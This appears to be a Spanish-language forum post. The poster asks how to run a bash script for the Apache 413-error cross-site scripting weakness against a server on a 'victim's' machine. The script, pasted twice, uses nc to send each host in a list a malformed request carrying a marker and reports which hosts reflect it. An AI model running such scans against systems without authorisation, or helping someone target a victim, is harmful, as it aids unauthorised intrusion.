hace un par de horas escanee una página web que corre en un sistema Apache, dicho servidor esta alojado en el ordenador de la víctima.
El escaneo lo ejecute en el famoso SSS (Shadow Security Scanner) y me devolvio la vulnerabilidad-> Apache HTTP Server 413 Error HTTP Request Method Cross-Site Scripting Weakness.
Esta vulnerabilidad trae un exploit adjunto en bash, el que he compilado en mi distro de Ubuntu, la duda es: ¿como ejecuto este exploit? ¿que valores tengo que pasar a los argumentos?
aquí pego el código fuente de dicho exploit:
Citar
#!/bin/bash
# PR07-37-scan
if [ $# -ne 1 ]
then
echo "$0 <hosts-file>"
exit
fi
for i in `cat $1`
do
if echo -en "<PROCHECKUP> / HTTP/1.1\nHost: $i\nConnection:
close\nContent-length: 0\nContent-length: 0\n\n" | nc -w 4 $i 80 | grep
-i '<PROCHECKUP>' > /dev/null
then
echo "$i is VULNERABLE!"
fi
done
# PR07-37-scan
if [ $# -ne 1 ]
then
echo "$0 <hosts-file>"
exit
fi
for i in `cat $1`
do
if echo -en "<PROCHECKUP> / HTTP/1.1\nHost: $i\nConnection:
close\nContent-length: 0\nContent-length: 0\n\n" | nc -w 4 $i 80 | grep
-i '<PROCHECKUP>' > /dev/null
then
echo "$i is VULNERABLE!"
fi
done
Agredecería eternamente vuestra ayuda,
un saludo a toda la comunidad.